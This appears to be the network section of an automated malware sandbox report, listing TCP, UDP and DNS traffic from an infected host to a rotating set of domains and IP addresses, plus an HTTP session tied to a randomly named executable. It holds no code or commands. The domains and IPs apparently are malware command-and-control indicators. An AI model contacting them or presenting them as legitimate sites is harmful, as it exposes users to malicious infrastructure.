Jan 6, 2025 14:33:17.733923912 CET	49712	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:17.738776922 CET	80	49712	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:17.738874912 CET	49712	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:17.740582943 CET	49712	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:17.745369911 CET	80	49712	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:18.609178066 CET	80	49712	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:18.609193087 CET	80	49712	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:18.609514952 CET	49712	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:18.611874104 CET	49712	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:18.616620064 CET	80	49712	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:31.804999113 CET	49714	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:31.809757948 CET	80	49714	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:31.809829950 CET	49714	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:31.811745882 CET	49714	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:31.816525936 CET	80	49714	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:33.325026035 CET	49714	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:33.331614971 CET	80	49714	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:33.331741095 CET	49714	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:34.343533039 CET	49733	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:34.348328114 CET	80	49733	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:34.348428011 CET	49733	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:34.350240946 CET	49733	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:34.355072975 CET	80	49733	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:35.856443882 CET	49733	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:35.863899946 CET	80	49733	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:35.863971949 CET	49733	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:36.874793053 CET	49753	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:36.880451918 CET	80	49753	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:36.882539988 CET	49753	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:36.884439945 CET	49753	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:36.892780066 CET	80	49753	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:36.893035889 CET	80	49753	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:38.387490988 CET	49753	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:38.393430948 CET	80	49753	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:38.393498898 CET	49753	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:39.405922890 CET	49769	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:39.410744905 CET	80	49769	85.159.66.93	192.168.2.8
Jan 6, 2025 14:33:39.413670063 CET	49769	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:39.415436983 CET	49769	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:33:39.420247078 CET	80	49769	85.159.66.93	192.168.2.8
Jan 6, 2025 14:34:40.131048918 CET	80	49769	85.159.66.93	192.168.2.8
Jan 6, 2025 14:34:40.132091045 CET	80	49769	85.159.66.93	192.168.2.8
Jan 6, 2025 14:34:40.132158995 CET	49769	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:34:40.133675098 CET	49769	80	192.168.2.8	85.159.66.93
Jan 6, 2025 14:34:40.139524937 CET	80	49769	85.159.66.93	192.168.2.8
Jan 6, 2025 14:34:45.303328037 CET	49984	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:45.308132887 CET	80	49984	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:45.308212996 CET	49984	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:45.310672998 CET	49984	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:45.316374063 CET	80	49984	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:46.825207949 CET	49984	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:46.830365896 CET	80	49984	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:46.830416918 CET	49984	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:47.879276991 CET	49985	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:47.884227991 CET	80	49985	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:47.890347958 CET	49985	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:47.915703058 CET	49985	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:47.920511007 CET	80	49985	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:48.655534983 CET	80	49985	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:48.655565977 CET	80	49985	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:48.655652046 CET	49985	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:49.434695005 CET	49985	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:50.457746983 CET	49986	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:50.462871075 CET	80	49986	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:50.463100910 CET	49986	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:50.465748072 CET	49986	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:50.470647097 CET	80	49986	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:50.470741987 CET	80	49986	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:51.150763035 CET	80	49986	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:51.150928020 CET	80	49986	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:51.150979042 CET	49986	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:51.983236074 CET	49986	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.000206947 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.005426884 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.005502939 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.007704973 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.012531996 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680147886 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680169106 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680200100 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680212021 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680217981 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680223942 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680228949 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680241108 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680248976 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680258989 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.680377960 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.680444002 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.685278893 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.685293913 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.685303926 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.685317039 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.685338974 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.685381889 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.685522079 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.735726118 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.777384996 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777411938 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777447939 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777460098 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777472973 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777545929 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.777807951 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.777867079 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777879000 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777892113 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777903080 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.777942896 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.777942896 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.778271914 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.778284073 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:34:53.779011965 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.831741095 CET	49987	80	192.168.2.8	91.195.240.94
Jan 6, 2025 14:34:53.836492062 CET	80	49987	91.195.240.94	192.168.2.8
Jan 6, 2025 14:35:06.939732075 CET	49988	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:06.944586039 CET	80	49988	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:06.944672108 CET	49988	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:06.947223902 CET	49988	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:06.952039957 CET	80	49988	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:07.563116074 CET	80	49988	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:07.563133955 CET	80	49988	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:07.563254118 CET	49988	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:08.450381041 CET	49988	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:09.468796968 CET	49989	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:09.473622084 CET	80	49989	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:09.473704100 CET	49989	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:09.475445032 CET	49989	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:09.480249882 CET	80	49989	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:10.065665007 CET	80	49989	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:10.065728903 CET	80	49989	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:10.065876007 CET	49989	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:10.981667995 CET	49989	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:12.000057936 CET	49990	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:12.004909992 CET	80	49990	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:12.005004883 CET	49990	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:12.010121107 CET	49990	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:12.014916897 CET	80	49990	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:12.015049934 CET	80	49990	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:12.644195080 CET	80	49990	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:12.644236088 CET	80	49990	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:12.647875071 CET	49990	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:13.512872934 CET	49990	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:14.531398058 CET	49991	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:14.536225080 CET	80	49991	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:14.539896011 CET	49991	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:14.543450117 CET	49991	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:14.548218966 CET	80	49991	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:15.139717102 CET	80	49991	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:15.158020020 CET	80	49991	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:15.158106089 CET	49991	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:15.159473896 CET	49991	80	192.168.2.8	66.29.149.46
Jan 6, 2025 14:35:15.164242983 CET	80	49991	66.29.149.46	192.168.2.8
Jan 6, 2025 14:35:20.275800943 CET	49992	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:20.280580044 CET	80	49992	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:20.280649900 CET	49992	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:20.282535076 CET	49992	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:20.287347078 CET	80	49992	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:20.950681925 CET	80	49992	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:20.951231956 CET	80	49992	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:20.951271057 CET	49992	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:21.795814037 CET	49992	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:22.813137054 CET	49993	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:22.818016052 CET	80	49993	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:22.818089962 CET	49993	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:22.820125103 CET	49993	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:22.824917078 CET	80	49993	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:23.505486965 CET	80	49993	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:23.505685091 CET	80	49993	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:23.505736113 CET	49993	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:24.326822996 CET	49993	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:25.346035957 CET	49994	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:25.350883007 CET	80	49994	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:25.350961924 CET	49994	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:25.353634119 CET	49994	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:25.358377934 CET	80	49994	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:25.358567953 CET	80	49994	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:26.039762020 CET	80	49994	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:26.040052891 CET	80	49994	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:26.043983936 CET	49994	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:26.856776953 CET	49994	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:27.875900984 CET	49995	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:27.880774021 CET	80	49995	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:27.882975101 CET	49995	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:27.885863066 CET	49995	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:27.890721083 CET	80	49995	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:28.571969986 CET	80	49995	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:28.572303057 CET	80	49995	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:28.573323011 CET	49995	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:28.574799061 CET	49995	80	192.168.2.8	195.110.124.133
Jan 6, 2025 14:35:28.579559088 CET	80	49995	195.110.124.133	192.168.2.8
Jan 6, 2025 14:35:49.991894960 CET	49996	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:49.996670008 CET	80	49996	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:50.000042915 CET	49996	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:50.003901005 CET	49996	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:50.008760929 CET	80	49996	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:50.590318918 CET	80	49996	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:50.591828108 CET	80	49996	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:50.595957994 CET	49996	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:51.540271997 CET	49996	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:52.563903093 CET	49997	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:52.568747997 CET	80	49997	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:52.568944931 CET	49997	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:52.575771093 CET	49997	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:52.580653906 CET	80	49997	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:53.133100033 CET	80	49997	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:53.133861065 CET	80	49997	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:53.133918047 CET	49997	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:54.075911999 CET	49997	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:55.095381975 CET	49998	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:55.100152016 CET	80	49998	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:55.100217104 CET	49998	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:55.102550983 CET	49998	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:55.107599974 CET	80	49998	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:55.107613087 CET	80	49998	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:55.667248011 CET	80	49998	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:55.667566061 CET	80	49998	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:55.667668104 CET	49998	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:56.606744051 CET	49998	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:57.642087936 CET	49999	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:57.646878958 CET	80	49999	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:57.646951914 CET	49999	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:57.649365902 CET	49999	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:57.654192924 CET	80	49999	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:58.216598988 CET	80	49999	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:58.216622114 CET	80	49999	217.196.55.202	192.168.2.8
Jan 6, 2025 14:35:58.216808081 CET	49999	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:58.221810102 CET	49999	80	192.168.2.8	217.196.55.202
Jan 6, 2025 14:35:58.226594925 CET	80	49999	217.196.55.202	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 14:32:45.242685080 CET	58167	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:32:45.683864117 CET	53	58167	1.1.1.1	192.168.2.8
Jan 6, 2025 14:33:01.638303041 CET	53866	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:33:01.647443056 CET	53	53866	1.1.1.1	192.168.2.8
Jan 6, 2025 14:33:09.771958113 CET	61484	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:33:10.128621101 CET	53	61484	1.1.1.1	192.168.2.8
Jan 6, 2025 14:33:23.625014067 CET	59374	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:33:23.640327930 CET	53	59374	1.1.1.1	192.168.2.8
Jan 6, 2025 14:33:31.703201056 CET	54575	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:33:31.802619934 CET	53	54575	1.1.1.1	192.168.2.8
Jan 6, 2025 14:34:45.141613960 CET	56443	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:34:45.300681114 CET	53	56443	1.1.1.1	192.168.2.8
Jan 6, 2025 14:34:58.846211910 CET	61602	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:34:58.856430054 CET	53	61602	1.1.1.1	192.168.2.8
Jan 6, 2025 14:35:06.922867060 CET	60219	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:35:06.937155962 CET	53	60219	1.1.1.1	192.168.2.8
Jan 6, 2025 14:35:20.172442913 CET	53465	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:35:20.271899939 CET	53	53465	1.1.1.1	192.168.2.8
Jan 6, 2025 14:35:33.578943014 CET	56848	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:35:33.588495016 CET	53	56848	1.1.1.1	192.168.2.8
Jan 6, 2025 14:35:41.641243935 CET	58887	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:35:41.831958055 CET	53	58887	1.1.1.1	192.168.2.8
Jan 6, 2025 14:35:49.923898935 CET	50943	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:35:49.981044054 CET	53	50943	1.1.1.1	192.168.2.8
Jan 6, 2025 14:36:03.235971928 CET	52315	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:36:03.244746923 CET	53	52315	1.1.1.1	192.168.2.8
Jan 6, 2025 14:36:11.298964977 CET	51944	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:36:11.308229923 CET	53	51944	1.1.1.1	192.168.2.8
Jan 6, 2025 14:36:19.365287066 CET	61597	53	192.168.2.8	1.1.1.1
Jan 6, 2025 14:36:19.373951912 CET	53	61597	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 14:32:45.242685080 CET	192.168.2.8	1.1.1.1	0x137e	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:01.638303041 CET	192.168.2.8	1.1.1.1	0x13fd	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:09.771958113 CET	192.168.2.8	1.1.1.1	0x35ac	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:23.625014067 CET	192.168.2.8	1.1.1.1	0xcc34	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:31.703201056 CET	192.168.2.8	1.1.1.1	0xa97d	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:34:45.141613960 CET	192.168.2.8	1.1.1.1	0x412f	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:34:58.846211910 CET	192.168.2.8	1.1.1.1	0xcf5c	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:06.922867060 CET	192.168.2.8	1.1.1.1	0xbfae	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:20.172442913 CET	192.168.2.8	1.1.1.1	0x27a1	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:33.578943014 CET	192.168.2.8	1.1.1.1	0x7291	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:41.641243935 CET	192.168.2.8	1.1.1.1	0xbb27	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:49.923898935 CET	192.168.2.8	1.1.1.1	0x8451	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:36:03.235971928 CET	192.168.2.8	1.1.1.1	0xba3a	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:36:11.298964977 CET	192.168.2.8	1.1.1.1	0x3d85	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:36:19.365287066 CET	192.168.2.8	1.1.1.1	0xc72d	Standard query (0)	www.shenzhoucui.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 14:32:45.683864117 CET	1.1.1.1	192.168.2.8	0x137e	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:01.647443056 CET	1.1.1.1	192.168.2.8	0x13fd	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:10.128621101 CET	1.1.1.1	192.168.2.8	0x35ac	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:23.640327930 CET	1.1.1.1	192.168.2.8	0xcc34	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:33:31.802619934 CET	1.1.1.1	192.168.2.8	0xa97d	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 14:33:31.802619934 CET	1.1.1.1	192.168.2.8	0xa97d	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 14:33:31.802619934 CET	1.1.1.1	192.168.2.8	0xa97d	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:34:45.300681114 CET	1.1.1.1	192.168.2.8	0x412f	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:34:58.856430054 CET	1.1.1.1	192.168.2.8	0xcf5c	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:06.937155962 CET	1.1.1.1	192.168.2.8	0xbfae	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:20.271899939 CET	1.1.1.1	192.168.2.8	0x27a1	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 14:35:20.271899939 CET	1.1.1.1	192.168.2.8	0x27a1	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:33.588495016 CET	1.1.1.1	192.168.2.8	0x7291	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:41.831958055 CET	1.1.1.1	192.168.2.8	0xbb27	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:35:49.981044054 CET	1.1.1.1	192.168.2.8	0x8451	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 6, 2025 14:35:49.981044054 CET	1.1.1.1	192.168.2.8	0x8451	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:36:03.244746923 CET	1.1.1.1	192.168.2.8	0xba3a	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:36:11.308229923 CET	1.1.1.1	192.168.2.8	0x3d85	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 14:36:19.373951912 CET	1.1.1.1	192.168.2.8	0xc72d	Name error (3)	www.shenzhoucui.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	154.215.72.110	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
